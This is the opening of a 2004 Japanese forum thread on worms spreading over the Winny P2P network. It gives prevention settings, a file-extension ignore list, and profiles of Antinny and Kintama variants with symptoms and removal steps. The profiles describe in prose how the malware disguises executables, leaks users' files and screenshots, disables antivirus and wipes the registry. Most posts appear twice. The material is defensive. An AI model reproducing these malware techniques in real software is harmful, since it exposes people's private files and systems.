Winnyを狙ったワーム・ウイルス情報 Part32
先ず、ここは初心者の質問・救済スレではありません。(これ大事)
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる
■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。
前スレ
Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/
テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる
■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。
前スレ
Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/
テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
|
|
|
2 :[名無し]さん(bin+cue).rar:04/12/13 08:07:03 ID:G9Avr3e+
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
3 :[名無し]さん(bin+cue).rar:04/12/13 08:12:53 ID:G9Avr3e+
■推奨無視リスト
このままIgnore.txtにコピペしてください。
.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
このままIgnore.txtにコピペしてください。
.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
4 :[名無し]さん(bin+cue).rar:04/12/13 08:14:16 ID:G9Avr3e+
■感染しないための注意1 〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
(フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
(アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
※アプリケーションのインストール時に弊害が起こることもあるので注意。
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
(フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
(アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
※アプリケーションのインストール時に弊害が起こることもあるので注意。
5 :[名無し]さん(bin+cue).rar:04/12/13 08:35:08 ID:NABHq3BL
∧,, ∧
(`・ω・´) 私が5ゲトしました!!
U θU
/ ̄ ̄T ̄ ̄\
|二二二二二二二|
| |
パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ
パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ
∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
( )】 ( )】 ( )】 【( ) 【( ) 【( )
/ /┘ . / /┘. / /┘ └\ \ └\ \ └\ \
ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ
(`・ω・´) 私が5ゲトしました!!
U θU
/ ̄ ̄T ̄ ̄\
|二二二二二二二|
| |
パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ
パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ パシャ
∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
( )】 ( )】 ( )】 【( ) 【( ) 【( )
/ /┘ . / /┘. / /┘ └\ \ └\ \ └\ \
ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ ノ ̄ゝ
6 :[名無し]さん(bin+cue).rar:04/12/13 08:43:28 ID:SKIlzWVJ
/ヽ ,
/´ `´ | ◎ /ヽ_____/l
'、 ,l // / '、
/ ̄ ,_,..ノ // l l
/ '、 // _,ゝ _,.ノ <おもすれー
/ PSP, ヽ // l´ `ヽ
| /`ヽ、`'‐‐-、 _| NDS |
l '` ` ̄_,.' ヽl i / l, 、
ヽ、__,. -‐ '' ´ .ヽ`' | l.,_,! /
ヽ ' /
`、.,____ ,. ′
/´ `´ | ◎ /ヽ_____/l
'、 ,l // / '、
/ ̄ ,_,..ノ // l l
/ '、 // _,ゝ _,.ノ <おもすれー
/ PSP, ヽ // l´ `ヽ
| /`ヽ、`'‐‐-、 _| NDS |
l '` ` ̄_,.' ヽl i / l, 、
ヽ、__,. -‐ '' ´ .ヽ`' | l.,_,! /
ヽ ' /
`、.,____ ,. ′
7 :[名無し]さん(bin+cue).rar:04/12/13 09:15:38 ID:G9Avr3e+
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
ttp://p46.aaacafe.ne.jp/~nydb/
CD/DVDドライブのAutorun(自動実行)の切り方
◆Win9x、Meの場合
1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
2.オプション項目の「挿入の自動通知」のチェックを外す
◆Win2000、XPの場合
1.[スタート]−[ファイル名を指定して実行] から regedit を起動
2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
ttp://p46.aaacafe.ne.jp/~nydb/
CD/DVDドライブのAutorun(自動実行)の切り方
◆Win9x、Meの場合
1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
2.オプション項目の「挿入の自動通知」のチェックを外す
◆Win2000、XPの場合
1.[スタート]−[ファイル名を指定して実行] から regedit を起動
2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
8 :[名無し]さん(bin+cue).rar:04/12/13 09:38:59 ID:iOpGC5ts
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
★関係ウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
★関係ウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
9 :[名無し]さん(bin+cue).rar:04/12/13 09:39:19 ID:iOpGC5ts
★流行種その2
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
(Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
(子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
(Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
バスターはPCCTool.exeを使えば再インスコせずに済む。
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
(Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
(子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
(Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
バスターはPCCTool.exeを使えば再インスコせずに済む。
10 :[名無し]さん(bin+cue).rar:04/12/13 09:40:28 ID:iOpGC5ts
★流行種その3
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
(削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
(削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。
11 :[名無し]さん(bin+cue).rar:04/12/13 09:40:59 ID:iOpGC5ts
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
[任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
(報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
[任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
(報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。
12 :[名無し]さん(bin+cue).rar:04/12/13 09:44:42 ID:iOpGC5ts
★新種(詳しい解析求む)
・元祖仙台キンタマ(仙台ギャラクシーエンジェルズ)
エロゲの「ホットギミックフォーエバー」「こんねこ」「グリグリ2」に
それぞれ少しずつ違うタイプの実行ファイルとして混入
→ノートン先生がW32.SillyP2Pとして対策済
症状:壁紙を赤くする、ファイル詰合わせ放流、SS放流、ny関連のtxtから情報抽出して放流など
時限発動でSS詰め合わせを(画像詰め合わせ)として放流かも?
・2次感染を狙ったもの(たぶん作者は仙台キンタマと同一)
仙台キンタマが放流する詰合わせに偽装したもの
(ユーザー名が2-3文字の女性名、トリップ無し)に
混在の.scr(スクリーンセーバ偽装)
→ノートン先生が Antinny.Gとして緊急対策済(次回定例更新時に反映)
症状:HDD内から.doc .xls .txt .jpgを検索してすべてを収集し
nyネットワークに放流する(恥ずかしい.jpg画像やメール送受信記録、Cookieなど)
・元祖仙台キンタマ(仙台ギャラクシーエンジェルズ)
エロゲの「ホットギミックフォーエバー」「こんねこ」「グリグリ2」に
それぞれ少しずつ違うタイプの実行ファイルとして混入
→ノートン先生がW32.SillyP2Pとして対策済
症状:壁紙を赤くする、ファイル詰合わせ放流、SS放流、ny関連のtxtから情報抽出して放流など
時限発動でSS詰め合わせを(画像詰め合わせ)として放流かも?
・2次感染を狙ったもの(たぶん作者は仙台キンタマと同一)
仙台キンタマが放流する詰合わせに偽装したもの
(ユーザー名が2-3文字の女性名、トリップ無し)に
混在の.scr(スクリーンセーバ偽装)
→ノートン先生が Antinny.Gとして緊急対策済(次回定例更新時に反映)
症状:HDD内から.doc .xls .txt .jpgを検索してすべてを収集し
nyネットワークに放流する(恥ずかしい.jpg画像やメール送受信記録、Cookieなど)
13 :[名無し]さん(bin+cue).rar:04/12/13 09:46:52 ID:iOpGC5ts
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
14 :[名無し]さん(bin+cue).rar:04/12/13 09:47:11 ID:0ecjqynP
15 :[名無し]さん(bin+cue).rar:04/12/13 09:47:49 ID:iOpGC5ts
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
Part31 http://tmp4.2ch.net/test/read.cgi/download/1100072614/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
